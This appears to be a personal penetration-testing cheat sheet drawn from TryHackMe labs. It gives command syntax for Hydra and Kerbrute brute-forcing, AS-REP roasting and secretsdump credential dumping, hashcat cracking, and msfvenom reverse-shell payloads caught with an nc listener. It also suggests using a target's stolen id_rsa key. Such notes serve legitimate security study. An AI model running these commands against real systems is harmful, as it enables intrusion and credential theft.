Various Tools & Their Syntax

Start a simple web server in Kali:

service apache2 start
# default landing dir: /var/www/html

# To stop/kill the serveer: 
service apache2 stop

# To check Apache status: 
service apache2 status

Place files you want to transfer to the target machine in the /var/www/html/ directory. Then from the target machine, access via html (browser, etc.) and download the files.

In Windows, use certutil from the CLI to download files (like wget in Linux):

certutil -urlcache -f http://[target ip]/filename.exe filename.exe

With the -f option, -urlcache forces fetching a specific URL and updating the cache.

Resource: documentation

Download the home/index page from a site:

curl http://[target ip]

Upload a file using PUT:

curl http://[target ip/[subdir] --upload-file gk_put.txt           # or:
curl -X PUT -T "/path/to/file" "http://myputserver.com/puturl.tmp"

Note: -X PUT is redundant when using -T (which is short for –upload-file)

The DNS (Domain Name System) maps IP addresses to domain names.

When you plug a domain name in your browser URI box…

1. Local cache is checked first for a valid mapping to an IP. TTL (measured in seconds) defines the length of time a mapping in cache is considered valid. If not found…
2. Your router sends the request to a recursive DNS server (usually your ISP or OpenDNS, etc.). If not found…
3. The recursive server passes the request to a root name server. Root name servers (13 unique IP addresses for them) keep track of the DNS servers in the next level down: top-level domain servers.
4. Top-Level Domain (TLD) Servers are split up by extensions (.com, .org, .co.uk, etc.). TLD servers keep track of DNS servers one level down: authoritative name servers.
5. Authoritative name servers are used to store DNS records for domains directly (the buck stops here). The IP mapped to the domain name you requested is sent back to you and your browser uses it to access the website you want to go to.

This whole process is automagic with browsers but dig can do all this manually (and show us the results).

Syntax:

dig [domain] @[dns-server-ip]

# Example:
dig google.com @1.1.1.1

GoBuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names. For this machine, we will focus on using it to brute-force directories.

You need a wordlist. In Kali: /usr/share/wordlists

Run GoBuster with a wordlist:

gobuster dir -u http://[ip]:[port] -w [/path/to/wordlist/file]

Flags:

grep for a “string” in all the files from root (/) or whatever directory you want

grep -rnw / -e "admin@syntex.com" 2>/dev/null
grep -rnw /usr/share/ -e "admin@syntex.com" 2>/dev/null

Options:

• -r : recursive; read all files under each directory, recursively
• -n : number; Prefix each line of output with the 1-based line number within its input file.
• -w : whole words; select only those lines containing matches that form whole words
• -e [pattern] : expression; search for all patterns given; protect pattern with “quotes”

2>/dev/null sends STDERR to the abyss instead of to the screen.

A password recovery tool…

Example Syntax:

• Three of the most important options are:
• -m Mode: the hash type, from the table in the help file
• -a Attack-Mode: from a smaller table in the help file
• -o Output file (so you don't have to do a –show later)

hashcat -m 18200 -a 0 -o cracked.txt hash.txt passwordlist.txt
# -m  mode for Kerberos 5, etype 23, AS-REP
# -a  straight (i.e., dictionary) attack mode; default attack mode
# -o  output file name cracked.txt

If you forget to put in the -o for an output file, you'll need to use the same command you used to crack the password and add –show to it.

HashCat Wiki for help: here.

Hydra is extremely functional for brute-forcing MULTIPLE different protocols.

• Usage & Examples

Specify a single username and single password to try (lower case l and p):

hydra -l [user] -p [password] [target IP] [ftp | ssh | etc]

Specify lists of users and/or passwords to try (upper case l and p):

hydra -L [/path/to/users.txt] -P [/path/to/passwords.txt] -vV [target IP] [ftp | ssh | etc]

Options:

• -t 4 : number of parallel connections per target
• -l [user] : single username of the account we are trying to compromise
• -p [password] : single password to try
• -L [/path/to/] : plaintext file containing possible usernames
• -P [/path/to/] : plaintext file containing possible passwords
• -vV : Very verbose: login+pass combo for each attempt
• [ftp | ssh | etc] : Sets the protocol (see “supported services” below)

Be very careful with your brute-force speed. You could crash the system or DoS it.

• The -t (tasks) options sets the number of connects in parallel (default is 16, for reference).
• You could set -t 2 or -t 3 and see if that plays nicer.
• Hydra actually recommends -t 1 through -t 4.

SMB:

hydra -l admin -P /usr/share/wordlists/rockyou.txt [target IP] smb

SSH:

hydra -l student -P rockyou.txt [ip] ssh

MySQL:

hydra -l root -P /usr/share/metasploit_framework/data/wordlists/unix_passwords.txt [target ip] mysql

WebDAV (http login):

hydra -L /.../common-users.txt -P  /.../common-passwords.txt [target ip] http-get /webdav/
# http-get : Indicates the protocol to be used
# /webdav/ : Indicates the directory where hydra can find the authentication mechanism

RDP:

hydra -L users.txt -P passwords.txt [target ip] rdp -s 3333
# -s : service port (if different than the default)

Supported services:

• adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird
• ftp[s]
• http[s]-{head|get|post}
• http[s]-{get|post}-form
• http-proxy http-proxy-urlenum
• icq imap[s] irc
• ldap2[s] ldap3[-{cram|digest}md5][s]
• memcached mongodb mssql mysql nntp
• oracle-listener oracle-sid
• pcanywhere pcnfs pop3[s] postgres
• radmin2 rdp redis rexec rlogin rpcap rsh rtsp
• s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak
• telnet[s] vmauthd vnc xmpp

Kerberos is the default authentication service for Microsoft Windows domains. It is intended to be more secure than NTLM by using third party ticket authorization and stronger encryption.

• Attack Cheat Sheet

Attack Privilege Requirements:

Kerbrute is a tool to quickly brute-force and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.

• Download the binary for your machine.
• chmod 777 [binary name] to make it executable.

Commands:

# to get the general help screen:
./kerbrute

# to get the help screen for a specific command: 
./kerbrute [command name] -h

# specific help example:
./kerbrute userenum -h

# to enumerate AD usernames:
./kerbrute userenum --dc [target IP] -d [domain] userlist.txt 

# enumerate AD usernames example: 
./kerbrute userenum --dc 10.10.215.44 -d THM-AD userlist.txt | tee output.txt

# Brute force user accounts from a domain controller using a supplied wordlist:
./kerbrute userenum --dc [IP Address] -d CONTROLLER.local user_wordlist.txt

Here are some usage examples.

Found in Kali here: /usr/share/doc/python3-impacket/examples

Impacket’s GetNPUsers.py will attempt to harvest the non-preauth AS_REP responses for a given list of usernames. These responses will be encrypted with the user’s password, which can then be cracked offline.

• Explanation & Example Syntax

# mine from TryHackMe Attacktive Directory, #1
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request -outputfile GetNPUsers_output.txt -format hashcat -usersfile usersfile2.txt -dc-ip 10.10.215.44 spookysec.local/

# mine from TryHackMe Attacktive Directory, #2
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -no-pass -usersfile usersfile2.txt -dc-ip 10.10.215.44 spookysec.local/

# from wadcoms (above)
python3 GetNPUsers.py test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -format hashcat -outputfile hashes.txt

Impacket’s secretsdump.py will perform various techniques to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from registries, dumping NTLM hashes, plaintext credentials, and kerberos keys, and dumping NTDS.dit. The following command will attempt to dump all secrets from the target machine using the previously mentioned techniques. [ Source. ]

Command:

python3 secretsdump.py test.local/john:password123@10.10.10.1

Some how-to stuff on interpreting the output: here.

Example:

#            |-- colon separated values               
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# |-- username |                     |                          |
#              |-- RID (Relative ID) |                          |
#                                    |-- LM (LAN Manager) Hash  |
#                                        Old & Deprecated       |
#                                                               |-- NTLM Hash (for
#                                                                   Pass-the-Hash)

To see the available payloads: msfvenom -l payloads (filter by piping to grep)

• Cheat Sheet

First, build a payload with MSFVenom (e.g., a reverse shell payload):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[local ip] LPORT=1234 -f exe > payload.exe
msfvenom -p cmd/unix/reverse_netcat LHOST=[local ip] LPORT=4444 R
# 
# -p    = payload
# LHOST = local host IP address (this is your machine's IP address)
# LPORT = local port to listen on (this is the port on your machine)
# -f    = format (of the output)
# R     = export the payload in raw format

A staged payload will follow this syntax (note the delimiter):

• windows/x64/meterpreter/reverse_tcp
• linux/x86/meterpreter/reverse_tcp

A non-staged payload will follow this syntax:

• windows/x64/meterpreter_reverse_tcp
• linux/x86/meterpreter_reverse_tcp

After that set up a listener on your attach machine:

nc -nvlp [listening port]

Then copy and paste the msfvenom payload into the target box and run it. You should get a reverse shell on your attack machine.

stuff 1

Ping Multiple IPs – One-Liners…

Windows:

FOR /L %i IN (1,1,254) DO ping -n 1 192.168.0.%i | FIND /i "Reply"

How it works:

• FOR /L %i IN (1, 1, 254) : Create a loop from 1 to 254, the range of valid IPs a 192.168.0.0/24 network.
• DO ping -n 1 192.168.1.%i : Follow the FOR loop by the ping command to execute on each iteration.
• | FIND /i “Reply” : filter to display only replies (kinda hinky, might need to tweak this a bit)

Redirect output to a file with: > filename.txt

Linux:

for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; done

How it works:

• for ip in $(seq 1 254); : create a loop from one to 254.
• do ping -c 1 192.168.1.$ip; done : ping the IP address, substituting the loop variable for the last part of the address, and then end the statement.

Redirect output to a file with: > filename.txt

Source: https://smallbusiness.chron.com/ping-ip-addresses-lan-68381.html

ssh [user_name]@[host]  # host can be either IP or domain name
# OR
ssh -i [key-file] [user_name]@[host]

The default Key Name is id_rsa.

• The private key: ~/.ssh/id_rsa
• The public key: ~/.ssh/id_rsa.pub

Note: You need to chmod 600 id_rsa in order for the file to be usable in a session.

If you can obtain the id_rsa file of a target, just put it in your ~/.ssh directory and ssh into the target machine. Or reference the key file with the -i switch if you put it in another directory somewhere.

Syntax:

scp [source] [destination]

Examples:

To copy a file from B to A while logged into B:

scp /path/to/file username@a:/path/to/destination
#   [source]      [destination]           

To copy a file from B to A while logged into A:

scp username@b:/path/to/file /path/to/destination
#   [source]                 [destination]

Listener: To listen to an interface on my local machine and see if a ping from inside a target machine is getting out (i.e., do we have the ability to execute system commands?)…

tcpdump ip proto \\icmp -i [interface name: eth0, tun0, etc.]